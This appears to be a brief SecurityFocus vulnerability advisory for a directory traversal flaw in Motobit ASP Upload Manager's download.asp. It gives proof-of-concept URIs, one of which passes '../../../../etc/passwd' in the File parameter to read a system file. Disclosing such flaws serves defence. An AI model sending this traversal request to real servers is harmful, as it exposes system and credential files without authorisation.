Motobit ASP Upload Manager Download.ASP Directory Traversal Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URIs are available:

http://www.example.com/download.asp?File=[File Path]&PT=[PostFix]
http://www.example.com/download.asp?File=../../../../etc/passwd&pt=zip


 

Privacy Statement
Copyright 2010, SecurityFocus